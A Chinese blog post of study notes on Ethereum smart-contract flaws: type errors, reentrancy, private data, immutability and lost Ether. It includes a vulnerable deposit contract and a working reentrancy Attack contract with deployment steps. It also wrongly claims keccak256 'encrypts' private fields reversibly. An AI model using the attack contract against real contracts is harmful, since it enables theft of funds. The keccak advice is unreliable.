以太坊一些脆弱性问题学习笔记2

最新推荐文章于 2022-07-24 22:48:28 发布
最新推荐文章于 2022-07-24 22:48:28 发布
阅读量523 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42127015/article/details/80883721
版权

1,类型转换错误

如果从一个合约到另一个合约的函数的直接调用的参数被错误地键入,或者被调用的合约的地址不正确,则不会发生任何事情,或者执行错误的代码。在任何情况下都不会抛出异常,并且调用者不知道。

function sendEther(address recipient) internal {
 recipient.transfer(this.balance);

}

始终检查函数的参数是否为有效变量。如果它是一个地址,请确保它是一个包含20个字节值的变量。

2,重入漏洞

在某些情况下,合同的回退功能允许它在终止之前重新输入调用者函数。这可能导致重复执行仅针对每个事务执行一次的函数。

合约代码

pragma solidity ^0.4.10;


contract IDMoney {
    address owner;
    mapping (address => uint256) balances;  // 记录每个打币者存入的资产情况


    event withdrawLog(address, uint256);
    
    function IDMoney() { owner = msg.sender; }
    function deposit() payable { balances[msg.sender] += msg.value; }
    function withdraw(address to, uint256 amount) {
        require(balances[msg.sender] > amount);
        require(this.balance > amount);


        withdrawLog(to, amount);  // 打印日志,方便观察 reentrancy
        
        to.call.value(amount)();  // 使用 call.value()() 进行 ether 转币时,默认会发所有的 Gas 给外部
        balances[msg.sender] -= amount;
    }
    function balanceOf() returns (uint256) { return balances[msg.sender]; }
    function balanceOf(address addr) returns (uint256) { return balances[addr]; }

}

恶意合约代码:

contract Attack {
    address owner;
    address victim;


    modifier ownerOnly { require(owner == msg.sender); _; }
    
    function Attack() payable { owner = msg.sender; }
    
    // 设置已部署的 IDMoney 合约实例地址
    function setVictim(address target) ownerOnly { victim = target; }
    
    // deposit Ether to IDMoney deployed
    function step1(uint256 amount) ownerOnly payable {
        if (this.balance > amount) {
            victim.call.value(amount)(bytes4(keccak256("deposit()")));
        }
    }
    // withdraw Ether from IDMoney deployed
    function step2(uint256 amount) ownerOnly {
        victim.call(bytes4(keccak256("withdraw(address,uint256)")), this, amount);
    }
    // selfdestruct, send all balance to owner
    function stopAttack() ownerOnly {
        selfdestruct(owner);
    }


    function startAttack(uint256 amount) ownerOnly {
        step1(amount);
        step2(amount / 2);
    }


    function () payable {
        if (msg.sender == victim) {
            // 再次尝试调用 IDCoin 的 sendCoin 函数,递归转币
            victim.call(bytes4(keccak256("withdraw(address,uint256)")), this, msg.value);
        }
    }

}

第一步:IDmoney合约develop

第二步:存钱函数deposit(),存入30以太币


第三步:换一个地址加入恶意合约,要输入大于1的以太币数据创建

第四步:开始设置之前的idmoney的存钱地址在恶意合约里调用


第五步:将剩余的 Gas 全部给予外部调用


3,数据加密

根据区块链的公共性质,标记为私有的合同字段不保证设置私有字段的秘密,合同所有者必须广播交易。需要使用加密协议来保证挖掘或检查区块链的任何人都看不到字段。

uint private balance;
address private owner;

string private secretKey;

使用标准的`keccack256()`方法或任何其他允许您随意解密代码的方法,加密您真正需要隐藏的所有私有变量。通常在客户端。

4,合约代码的不变性

将合同添加到区块链时,无法对其进行编辑。如果发现合同有缺陷,那么通常没有什么可以做的就是杀死合同(假设合同创建者已采取措施使其成为可能)。



contract Lost {


  function () payable {}

}

确保包含一个具有“selfdestruct(所有者)”的功能来收回资金并在极端情况下终止合同。创建一种方法来提取所有者可能存储在合同中的以太网。

5,转移以太币的时候丢失

如果您将以太币发送到一个无效的地址,而该地址不存在或地址格式不正确,那么将失去发送的以太币而无法恢复它。


function transferEther(address sender) payable {


  sender.tranfer(msg.value);


}

确保将以太币发送到有效地址,并且该地址已正确写入所有字符。可以在功能中检查它。
weixin_42127015
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
开篇词:“桌面应用”是一顶璀璨的王冠
一个被知识诅咒的人
09-22 3070
大家好,我是李宁,网名“银河使者”,IT 图书作者(代表作《Python 从菜鸟到高手》,欧瑞科技创始人,领导和参与了欧瑞科技公众号,小程序(极客题库)的开发。现在正带领团队研发高效全平台开发工具 OriUnity,主要使用的技术包括 Electron 和 Go 语言。 课程背景 可能有很多读者会有这样的疑问:为什么用 JavaScript 来开发桌面应用? 曾经的 JavaScript 脆弱、简...
你离真正的全栈开发人员只差学会 Electron
GitChat
01-10 1万+
为什么用 JavaScript 来开发桌面应用 曾经的 JavaScript 脆弱、简陋、甚至有被边缘化的危险,不过 JavaScript 在经过了两次飞跃后(以 V8 为首的 JavaScript 引擎和 Node.js 的问世),不再受人欺负,早已升级为绿博士(复仇者联盟 4 中班纳博士和绿巨人的合体,强大而充满智慧)。 V8 引擎让 JavaScript 的运行速度飞快,Node.js 让 ...
以太坊智能合约安全入门了解一下(下)
omnispace的博客
05-29 4471
作者:RickGray作者博客:http://rickgray.me/2018/05/26/ethereum-smart-contracts-vulnerabilities-review-part2/(注:本文分上/下两部分完成,上篇链接《以太坊智能合约安全入门了解一下(上)》) 接上篇3. Arithmetic Issues算数问题?通常来说,在编程语言里算数问题导致的漏洞最多的就是整数溢出了,...
使用python和solidity分别计算以太坊智能合约函数选择器和支持接口常量值
pengfeng111833的专栏
10-28 1038
技术标签:python区块链以太坊知识合集以太网 一、什么是函数选择器与支持接口常量值 我们在浏览OpenZeppelin编写的ERC721示例(模板)合约时,会看到这么一段代码: /* * bytes4(keccak256('balanceOf(address)')) == 0x70a08231 * bytes4(keccak256('ownerOf(uint256)')) == 0x6352211e * bytes4(keccak...
python3 中 使用和solidity 中一样的keccak256算法 并且结果一致
kangwei_liu的博客
07-24 1369
python3 使用keccak256 与solidity 结果一致
solidity之msg.sender总结(一个实时变化的变量)
weixin_43343144的博客
04-02 9709
务必注意:msg.sender是一个实时变化的变量!在合约中,方法的调用者不一样,msg.sender就会不一样! pragma solidity >=0.5.0 <0.7.0; import "../../node_modules/openzeppelin-solidity/contracts/token/ERC20/ERC20.sol"; contract TestTok...
以太坊知识教程------智能合约(2)调用 delegatecall call send
thefist的专栏
01-09 672
1. 消息调用call(…) <address>.call(…) 可以接受任何长度、任何类型的参数,每个参数将被填充到 32 字节并拼接在一起 。 但有一种例外情况,当第一个参数的长度恰好是 4 字节时,该参数不会被打包成 32 字节,而是被作为指定函数的签名 。 eg. 第一个参数 bytes4(keccak256(”fun(uint256)”))为长度 4字节的函数签名,表示调用一个函数签名为 fun(unit256)的函数, 4 则是实际传给 fun 函数的参数: address nameRe
【读书笔记】2018《后谷歌时代:大数据的衰落及区块链经济的崛起》
安全曼巴2020
01-28 2239
第一章:勿窃此书 1. 威廉·布莱恩·阿瑟(圣菲研究院,2017):当前经济发展到了基本上为每个人都生产了足够多产品的阶段……故而,我们正在步入的这个新时代所面临的不再是生产多少产品,而是关于分配,关于人们如何分享生产所得的问题。 2. 安全不是通过增加新的密码层,增加更多着装随意的“特警队”队员,增加入侵检测方案,提供反病毒补丁,增强恶意软件预防和软件修复就能实现。安全是所有其他服务的基础,...
区块链与联邦学习综述
热门推荐
E_chos的博客
12-20 2万+
本期分享的论文是由Dinh C. Nguyen等人在2021年发表在IEEE Internet of Things Journal的文章《Federated Learning Meets Blockchain in Edge Computing Opportunities and Challenges》。
Electron 开发入门
GitChat
01-09 2万+
课程亮点 剖析 Electron 从安装到发布的整个流程 如何使用 Git 管理 Electron 应用源代码 如何使用 C++ 开发 Electron 本地模块 知识点 + 示例 + 源代码 课程背景 Electron 允许使用 Web 技术(HTML 5、CSS 3、JavaScript)开发跨平台桌面应用,这对 Web 前端和 Node.js 开发者是一大福音,因为从此又多了一项技能。目...
SolidityPythonTutorial:了解如何在 Solidity 中编写基本智能合约,然后使用 Web3.py 将其与 Python 应用程序集成
07-24
Solidity Python 教程 此代码是博客文章
Solidity - 智能合约标准ERC-165
ling1998的博客
03-29 2228
目录 1、如何获取接囗标识符 2、合约如何实现接囗 3、如何检测合约实现了ERC-165接囗 4、如何检测合约实现了指定的接囗 测试 ERC-165 Standard Interface Detection ,即检测合约是否实现接囗规范,使用函数标识(.selecor)进行检测。参考:EIP-165: Standard Interface Detection 1、如何获取接囗标识符 pragma solidity ^0.4.20; interface Solidity101 {...
ERC721
hello,是翠花呀
08-08 2316
ERC721 ERC20是标准Token接口,这个规定了Token的基本功能, 是可置换的,Token之间没有区别,所有的token是一样的。ERC721则是针对不可置换Token的智能合约标准接口,(non-fungile tokens)不可置换Token简称NFTs,操作标准API的实现方法。 ERC20是标准Token接口,ERC20的Token可以无限细分为10^18份,而ERC721...
【Solidity】4.单位和全局可变量 - 深入理解Solidity
weixin_33955681的博客
09-12 366
索引 【Solidity】1.一个Solidity源文件的布局 【Solidity】2.合约的结构体 【Solidity】3.类型 【Solidity】4.单位和全局可变量 【Solidity】5.表达式和控制结构 【Solidity】6. 合约 【Solidity】7. 部件 【Solidity】8. 杂项 ...
以太坊合约调用关系,谁才是msg.sender
Lyon_Nee的博客
12-12 3330
今天在技术群里跟大家做技术交流,发现还是有很多人还是对以太坊的智能合约调用关系不是很清楚。所以我打算专门写一篇博文来说一下这个问题。 直接上代码: contract Wallet{ ERC20Token public token; constructor(address _token) public{ token = ERC20Token(_token); ...
区块链安全 - DAO攻击事件解析
Exploit的小站~
03-05 2万+
0x00 前言最近关注了一下区块链方面的安全,因此翻出来之前的DAO攻击事件研究了一番,形成此文。之后可能还会发一些其他的安全分析文章。0x00 基础知识1.跨合约调用智能合约之间的调用本质上是外部调用,可以使用message call或者创建智能合约对象的形式进行调用。(1)使用message call比如合约1调用合约2的某个方法:bytes4 methodId = bytes4(keccak...
以太坊智能合约安全入门了解一下(上)
omnispace的博客
05-29 846
作者:RickGray作者博客:http://rickgray.me/2018/05/17/ethereum-smart-contracts-vulnerabilites-review/(注:本文分上/下两部分完成,下篇链接《以太坊智能合约安全入门了解一下(下)》)最近区块链漏洞不要太火,什么交易所用户被钓鱼导致 APIKEY 泄漏,代币合约出现整数溢出漏洞致使代币归零, MyEtherWalle...
以太坊里合约A调用合约B里的函数
sanqima的专栏
03-02 1036
    在以太坊中,常常涉及到合约之间的相互调用,可以使用call(bytes4(keccak256(“被调用的函数原型”)来实现。     下面介绍,合约EthTwo通过call()方式,来调用合约EthOne里的setNum()方法。 1、编写合约EthOne     //EthOne.sol pragma solidity ^0.4.18; contract EthOne { uint public num = 1; function setNum(uint val) public r
以太坊合约调用call、callcode和delegatecall的联系与区别
sanqima的专栏
03-03 3061
    在以太坊中,若需要合约与合约之间的调用,则可以使用call、callcode和delegatecall方法,它们之间的联系如下: 调用方式 修改storage 调用者的msg.sender 被调用的msg.sender 执行的上下文 推荐 call 修改被调用者的合约storage 交易的发起者地址 调用者地址 在被调用者里 是 callcode 修改调用者的合约storage 调用者地址 调用者地址 在调用者里 否 delegatecall 修改调用者的合约storage
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值